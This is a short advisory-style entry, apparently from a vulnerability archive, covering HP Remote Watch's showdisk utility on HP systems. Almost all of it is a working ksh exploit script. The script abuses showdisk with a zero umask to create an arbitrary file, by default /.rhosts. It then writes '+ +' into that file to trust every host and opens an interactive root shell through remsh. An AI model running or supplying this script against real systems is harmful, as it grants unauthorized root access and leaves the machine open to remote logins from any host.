COMMAND

    /usr/remwatch/bin/disks/showdisk

SYSTEMS AFFECTED

    HP

PROBLEM

#!/bin/ksh

# OK.. this bug gets inserted  into remwatch after the patch.. It  was
# there before  in some versions,  but now it's  pretty much universal
# if the patch gets installed...

if [ ! -x /usr/remwatch/bin/disks/showdisk ]
then
  echo This is an exploit for the showdisk utility internal to
  echo HP\'s Remote Watch series of programs.
  echo The showdisk utility doesn\'t appear to be on your system.
  echo Moo
  exit
fi

FILE=$1
if [ -z "$FILE" ]
then
  FILE=/.rhosts
fi

if [ -f "$FILE" ]
then
  echo "Hey, there already a ${FILE}!"
  echo "I'd rather enjoy making new files, thank you very much..."
  exit
fi

umask 0000
/usr/remwatch/bin/disks/showdisk arg arg ${FILE} arg > /dev/null 2>&1
>${FILE}
ls -l ${FILE}

if [ "${FILE}" = "/.rhosts" ]
then
  echo "Adding + + ..."
  echo "+ +" >> /.rhosts
  remsh localhost -l root ksh -i
fi